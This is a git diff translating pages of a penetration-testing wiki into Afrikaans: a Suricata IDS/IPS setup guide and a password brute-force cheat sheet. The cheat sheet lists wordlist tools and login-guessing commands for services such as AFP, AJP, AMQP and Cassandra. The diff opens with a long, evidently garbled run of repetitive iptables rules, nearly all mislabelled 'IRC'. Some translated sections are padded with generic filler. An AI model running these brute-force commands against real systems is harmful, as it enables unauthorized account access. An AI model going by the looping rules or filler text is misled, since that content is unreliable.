--dport 6667 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir Rsync +sudo iptables -A OUTPUT -p tcp --dport 873 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir DNSSEC +sudo iptables -A OUTPUT -p tcp --dport 853 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir DHCP +sudo iptables -A OUTPUT -p udp --dport 67:68 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 194 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 6660:6669 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 7000 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 8000 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9000 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9001 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9009 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9010 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9020 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9030 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9040 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9050 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9060 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9070 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9080 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9090 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9100 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9110 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9120 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9130 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9140 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9150 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9160 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9170 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9180 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9190 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9200 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9210 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9220 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9230 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9240 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9250 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9260 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9270 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9280 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9290 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9300 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9310 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9320 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9330 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9340 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9350 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9360 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9370 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9380 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9390 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9400 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9410 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9420 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9430 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9440 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9450 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9460 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9470 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9480 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9490 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9500 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9510 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9520 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9530 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9540 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9550 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9560 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9570 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9580 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9590 -j NFQUEUE --queue-num 1 + +# Skep 'n nuwe iptables reël vir IRC +sudo iptables -A OUTPUT -p tcp --dport 9600 -j NFQUEUE -- ```bash # Install details from: https://suricata.readthedocs.io/en/suricata-6.0.0/install.html#install-binary-packages # Ubuntu @@ -74,7 +386,7 @@ apt-get install suricata # Debian echo "deb http://http.debian.net/debian buster-backports main" > \ - /etc/apt/sources.list.d/backports.list +/etc/apt/sources.list.d/backports.list apt-get update apt-get install suricata -t buster-backports @@ -90,11 +402,11 @@ suricata-update ## To use the dowloaded rules update the following line in /etc/suricata/suricata.yaml default-rule-path: /var/lib/suricata/rules rule-files: - - suricata.rules +- suricata.rules # Run ## Add rules in /etc/suricata/rules/suricata.rules -systemctl suricata start +systemctl suricata start suricata -c /etc/suricata/suricata.yaml -i eth0 @@ -102,7 +414,7 @@ suricata -c /etc/suricata/suricata.yaml -i eth0 suricatasc -c ruleset-reload-nonblocking ## or set the follogin in /etc/suricata/suricata.yaml detect-engine: - - rule-reload: true +- rule-reload: true # Validate suricata config suricata -T -c /etc/suricata/suricata.yaml -v @@ -111,8 +423,8 @@ suricata -T -c /etc/suricata/suricata.yaml -v ## Config drop to generate alerts ## Search for the following lines in /etc/suricata/suricata.yaml and remove comments: - drop: - alerts: yes - flows: all +alerts: yes +flows: all ## Forward all packages to the queue where suricata can act as IPS iptables -I INPUT -j NFQUEUE @@ -130,76 +442,70 @@ Type=simple systemctl daemon-reload ``` +### Reëlsdefinisies -### Rules Definitions - -[From the docs:](https://github.com/OISF/suricata/blob/master/doc/userguide/rules/intro.rst) A rule/signature consists of the following: - -* The **action**, determines what happens when the signature matches. -* The **header**, defines the protocol, IP addresses, ports and direction of the rule. -* The **rule options**, define the specifics of the rule. +[Van die dokumentasie:](https://github.com/OISF/suricata/blob/master/doc/userguide/rules/intro.rst) 'n Reël/handtekening bestaan uit die volgende: +* Die **aksie**, bepaal wat gebeur wanneer die handtekening ooreenstem. +* Die **kop**, definieer die protokol, IP-adresse, poorte en rigting van die reël. +* Die **reël-opsies**, definieer die spesifieke van die reël. ```bash alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"HTTP GET Request Containing Rule in URI"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"rule"; fast_pattern; classtype:bad-unknown; sid:123; rev:1;) ``` +#### **Geldig aksies is** -#### **Valid actions are** +* waarskuwing - genereer 'n waarskuwing +* slaag - stop verdere inspeksie van die pakkie +* **verwerp** - verwerp pakkie en genereer waarskuwing +* **afwys** - stuur RST/ICMP onbereikbare fout na die sender van die ooreenstemmende pakkie. +* verwerpbron - dieselfde as net _afwys_ +* verwerpdoel - stuur RST/ICMP foutpakkie na die ontvanger van die ooreenstemmende pakkie. +* verwerpbeide - stuur RST/ICMP foutpakkies na beide kante van die gesprek. -* alert - generate an alert -* pass - stop further inspection of the packet -* **drop** - drop packet and generate alert -* **reject** - send RST/ICMP unreachable error to the sender of the matching packet. -* rejectsrc - same as just _reject_ -* rejectdst - send RST/ICMP error packet to the receiver of the matching packet. -* rejectboth - send RST/ICMP error packets to both sides of the conversation. +#### **Protokolle** -#### **Protocols** - -* tcp (for tcp-traffic) +* tcp (vir tcp-verkeer) * udp * icmp -* ip (ip stands for ‘all’ or ‘any’) -* _layer7 protocols_: http, ftp, tls, smb, dns, ssh... (more in the [**docs**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html)) +* ip (ip staan vir 'alles' of 'enige') +* _laag7-protokolle_: http, ftp, tls, smb, dns, ssh... (meer in die [**dokumentasie**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/intro.html)) -#### Source and Destination Addresses +#### Bron- en Bestemmingsadressering -It supports IP ranges, negations and a list of addresses: +Dit ondersteun IP-reekse, negasies en 'n lys van adresse: -| Example | Meaning | +| Voorbeeld | Betekenis | | ------------------------------ | ---------------------------------------- | -| ! 1.1.1.1 | Every IP address but 1.1.1.1 | -| !\[1.1.1.1, 1.1.1.2] | Every IP address but 1.1.1.1 and 1.1.1.2 | -| $HOME\_NET | Your setting of HOME\_NET in yaml | -| \[$EXTERNAL\_NET, !$HOME\_NET] | EXTERNAL\_NET and not HOME\_NET | -| \[10.0.0.0/24, !10.0.0.5] | 10.0.0.0/24 except for 10.0.0.5 | +| ! 1.1.1.1 | Elke IP-adres behalwe 1.1.1.1 | +| !\[1.1.1.1, 1.1.1.2] | Elke IP-adres behalwe 1.1.1.1 en 1.1.1.2 | +| $HOME\_NET | Jou instelling van HOME\_NET in yaml | +| \[$EXTERNAL\_NET, !$HOME\_NET] | EXTERNAL\_NET en nie HOME\_NET | +| \[10.0.0.0/24, !10.0.0.5] | 10.0.0.0/24 behalwe vir 10.0.0.5 | -#### Source and Destination Ports +#### Bron- en Bestemmingspoorte -It supports port ranges, negations and lists of ports +Dit ondersteun poortreeks, negasies en lys van poorte -| Example | Meaning | +| Voorbeeld | Betekenis | | --------------- | -------------------------------------- | -| any | any address | -| \[80, 81, 82] | port 80, 81 and 82 | -| \[80: 82] | Range from 80 till 82 | -| \[1024: ] | From 1024 till the highest port-number | -| !80 | Every port but 80 | -| \[80:100,!99] | Range from 80 till 100 but 99 excluded | -| \[1:80,!\[2,4]] | Range from 1-80, except ports 2 and 4 | +| enige | enige adres | +| \[80, 81, 82] | poort 80, 81 en 82 | +| \[80: 82] | Reeks van 80 tot 82 | +| \[1024: ] | Vanaf 1024 tot die hoogste poortnommer | +| !80 | Elke poort behalwe 80 | +| \[80:100,!99] | Reeks van 80 tot 100 maar 99 uitgesluit | +| \[1:80,!\[2,4]] | Reeks van 1-80, behalwe poorte 2 en 4 | -#### Direction - -It's possible to indicate the direction of the communication rule being applied: +#### Rigting +Dit is moontlik om die rigting van die kommunikasiereël aan te dui wat toegepas word: ``` source -> destination source <> destination (both directions) ``` +#### Sleutelwoorde -#### Keywords - -There are **hundreds of options** available in Suricata to search for the **specific packet** you are looking for, here it will be mentioned if something interesting is found. Check the [**documentation** ](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/index.html)for more! - +Daar is **honderde opsies** beskikbaar in Suricata om te soek na die **spesifieke pakkie** waarna jy soek, hier sal genoem word as iets interessant gevind word. Kyk na die [**dokumentasie**](https://suricata.readthedocs.io/en/suricata-6.0.0/rules/index.html) vir meer inligting! ```bash # Meta Keywords msg: "description"; #Set a description to the rule @@ -240,15 +546,14 @@ drop tcp any any -> any any (msg:"regex"; pcre:"/CTF\{[\w]{3}/i"; sid:10001;) ## Drop by port drop tcp any any -> any 8000 (msg:"8000 port"; sid:1000;) ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/generic-methodologies-and-resources/brute-force.md b/generic-methodologies-and-resources/brute-force.md index 297231576..19fef1846 100644 --- a/generic-methodologies-and-resources/brute-force.md +++ b/generic-methodologies-and-resources/brute-force.md @@ -1,30 +1,30 @@ -# Brute Force - CheatSheet +# Brute Force - Spiekbrief
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Default Credentials +## Standaardlegitimasie -**Search in google** for default credentials of the technology that is being used, or **try these links**: +**Soek in Google** vir standaardlegitimasie van die tegnologie wat gebruik word, of **probeer hierdie skakels**: * [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet) * [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html) @@ -39,12 +39,11 @@ Other ways to support HackTricks: * [**https://many-passwords.github.io/**](https://many-passwords.github.io) * [**https://theinfocentric.com/**](https://theinfocentric.com/) -## **Create your own Dictionaries** +## **Skep jou eie Woordeboeke** -Find as much information about the target as you can and generate a custom dictionary. Tools that may help: +Vind soveel moontlike inligting oor die teiken en genereer 'n aangepaste woordeboek. Hulpmiddels wat kan help: ### Crunch - ```bash crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst) @@ -55,47 +54,42 @@ crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using chars ^ Special characters including spac crunch 6 8 -t ,@@^^%% ``` - ### Cewl +Cewl is 'n hulpmiddel wat gebruik word om woordlyste te skep deur webwerwe te skandeer vir sleutelwoorde. Dit kan gebruik word vir aanvalle soos brute force en woordeboekaanvalle. Cewl kan ook gebruik word om sosiale media-profiels te analiseer en inligting te versamel oor 'n teiken persoon. Dit is 'n kragtige hulpmiddel vir inligtingversameling en kan 'n waardevolle bron wees vir 'n hacker. ```bash cewl example.com -m 5 -w words.txt ``` - ### [CUPP](https://github.com/Mebus/cupp) -Generate passwords based on your knowledge of the victim (names, dates...) - +Genereer wagwoorde gebaseer op jou kennis van die slagoffer (name, datums...) ``` python3 cupp.py -h ``` - ### [Wister](https://github.com/cycurity/wister) -A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target. - +'n Woordelys-generator-hulpmiddel wat jou in staat stel om 'n stel woorde te voorsien, wat jou die moontlikheid gee om verskeie variasies van die gegee woorde te skep, en sodoende 'n unieke en ideale woordelys te skep om te gebruik met betrekking tot 'n spesifieke teiken. ```bash python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst - __ _______ _____ _______ ______ _____ - \ \ / /_ _|/ ____|__ __| ____| __ \ - \ \ /\ / / | | | (___ | | | |__ | |__) | - \ \/ \/ / | | \___ \ | | | __| | _ / - \ /\ / _| |_ ____) | | | | |____| | \ \ - \/ \/ |_____|_____/ |_| |______|_| \_\ +__ _______ _____ _______ ______ _____ +\ \ / /_ _|/ ____|__ __| ____| __ \ +\ \ /\ / / | | | (___ | | | |__ | |__) | +\ \/ \/ / | | \___ \ | | | __| | _ / +\ /\ / _| |_ ____) | | | | |____| | \ \ +\/ \/ |_____|_____/ |_| |______|_| \_\ + +Version 1.0.3 Cycurity - Version 1.0.3 Cycurity - Generating wordlist... [########################################] 100% Generated 67885 lines. Finished in 0.920s. ``` - ### [pydictor](https://github.com/LandGrey/pydictor) -### Wordlists +### Woordlyste * [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists) * [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium) @@ -111,17 +105,16 @@ Finished in 0.920s.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Services +## Dienste -Ordered alphabetically by service name. +Alfabeties gerangskik volgens diensnaam. ### AFP - ```bash nmap -p 548 --script afp-brute msf> use auxiliary/scanner/afp/afp_login @@ -131,114 +124,235 @@ msf> set PASS_FILE msf> set USER_FILE msf> run ``` - ### AJP +AJP (Apache JServ Protocol) is a protocol used by Apache Tomcat to communicate with web servers. It is similar to the HTTP protocol but is more efficient for communication between the web server and the application server. + +AJP can be vulnerable to brute force attacks, where an attacker attempts to guess the correct username and password combination to gain unauthorized access to the application server. Brute force attacks can be performed using automated tools that systematically try different combinations until the correct one is found. + +To protect against AJP brute force attacks, it is important to implement strong authentication mechanisms, such as using complex passwords and enforcing account lockouts after a certain number of failed login attempts. Additionally, monitoring and logging failed login attempts can help detect and respond to brute force attacks in a timely manner. + +It is also recommended to regularly update and patch the software used for AJP communication to ensure any known vulnerabilities are addressed. Regular security assessments and penetration testing can help identify and mitigate any potential weaknesses in the AJP implementation. + +By following these best practices, organizations can reduce the risk of AJP brute force attacks and ensure the security of their application servers. ```bash nmap --script ajp-brute -p 8009 ``` +## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM en Solace) -## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace) +AMQP (Advanced Message Queuing Protocol) is 'n protokol wat gebruik word vir die uitruil van boodskappe tussen toepassings. Dit word dikwels gebruik in boodskapverspreidingsstelsels soos ActiveMQ, RabbitMQ, Qpid, JORAM en Solace. Hierdie platforms maak gebruik van AMQP om boodskappe te stuur en te ontvang. +### Brute Force-aanvalle op AMQP + +'n Brute Force-aanval op AMQP behels die poging om die regte gebruikersnaam en wagwoordkombinasie te raai om toegang tot die AMQP-stelsel te verkry. Hier is 'n paar metodes wat gebruik kan word om 'n brute force-aanval op AMQP uit te voer: + +1. Woordelys-aanval: Hierdie metode behels die gebruik van 'n woordelys van algemene gebruikersname en wagwoordkombinasies om toegang te probeer verkry. Dit kan gedoen word met behulp van gereedskap soos Hydra of Medusa. + +2. Brute Force-aanval met aangepaste kombinasies: Hierdie metode behels die gebruik van 'n gereedskap soos Hydra of Medusa om aangepaste kombinasies van gebruikersname en wagwoorde te probeer. Dit kan nuttig wees as die standaard kombinasies nie suksesvol is nie. + +3. Woordeboek-aanval met aanpassings: Hierdie metode behels die gebruik van 'n woordelys van algemene woorde en die aanpassing van die woorde deur byvoorbeeld hoofletters, syfers of spesiale karakters by te voeg. Dit kan gedoen word met behulp van gereedskap soos John the Ripper of Hashcat. + +Dit is belangrik om te onthou dat brute force-aanvalle tydrowend kan wees en dat dit 'n groot hoeveelheid rekenaarhulpbronne kan vereis. Dit is ook belangrik om etiese hackingpraktyke te volg en slegs toestemming te verkry om 'n brute force-aanval uit te voer op 'n stelsel waarvoor jy bevoegd is om dit te doen. ```bash legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl] ``` - ### Cassandra +Cassandra is 'n gedistribeerde databasisstelsel wat ontwerp is om hoë beskikbaarheid en skaalbaarheid te bied vir groot hoeveelhede data. Dit is 'n NoSQL-databasis wat gebruik maak van 'n kolomgebaseerde model om data te stoor. Dit is bekend vir sy vermoë om groot hoeveelhede data te hanteer en hoë lees- en skryfvermoëns te bied. + +#### Brute Force-aanvalle op Cassandra + +Brute force-aanvalle is 'n metode wat gebruik word om toegang te verkry tot 'n stelsel deur alle moontlike kombinasies van gebruikersname en wagwoorde te probeer. Hier is 'n paar bruto kragte tegnieke wat gebruik kan word om 'n Cassandra-databasis aan te val: + +1. **Woordelys-aanval**: Hierdie metode behels die gebruik van 'n woordelys van algemene wagwoorde om toegang te verkry tot 'n Cassandra-databasis. Dit is belangrik om 'n uitgebreide woordelys te hê wat verskillende kombinasies van woorde, frases en getalle bevat. + +2. **Brute Force-aanval met aangepaste kombinasies**: Hierdie metode behels die gebruik van 'n program of skripsie om alle moontlike kombinasies van karakters vir gebruikersname en wagwoorde te genereer en te probeer. Dit kan 'n tydrowende proses wees, veral as die wagwoordlengte lank is. + +3. **Rainbow-tafelaanval**: Hierdie metode behels die gebruik van 'n vooraf berekende tafel met wagwoorde en hul ooreenstemmende hashowaardes om toegang te verkry tot 'n Cassandra-databasis. Dit kan 'n effektiewe metode wees as die oorspronklike wagwoorde nie sterk gehash is nie. + +Dit is belangrik om te verseker dat sterk wagwoorde gebruik word en dat die nodige veiligheidsmaatreëls geïmplementeer word om brute force-aanvalle op Cassandra te voorkom. ```bash nmap --script cassandra-brute -p 9160 # legba ScyllaDB / Apache Casandra legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042 ``` - ### CouchDB +CouchDB is 'n NoSQL databasis wat gebruik maak van 'n dokument-georiënteerde benadering. Dit is bekend vir sy veelsydigheid en skalerbaarheid. Hier is 'n paar brutaal kragtegnieke wat jy kan gebruik om toegang tot 'n CouchDB-databasis te verkry: + +#### 1. Standaard wagwoorde + +Baie gebruikers stel nie hul eie wagwoorde in vir hul CouchDB-databasisse nie. Dit beteken dat jy dalk toegang kan verkry deur die standaard wagwoord te gebruik. Dit is belangrik om te onthou dat dit slegs werk as die gebruiker nie 'n wagwoord ingestel het nie. + +#### 2. Woordelys-aanvalle + +'n Woordelys-aanval behels die gebruik van 'n lys algemene wagwoorde en kombinasies om toegang te verkry. Jy kan 'n woordelys van algemene wagwoorde vind en dit gebruik om te probeer om in te breek in die CouchDB-databasis. + +#### 3. Brute krag-aanvalle + +'n Brute krag-aanval behels die outomatiese poging om alle moontlike kombinasies van karakters te probeer totdat die regte wagwoord 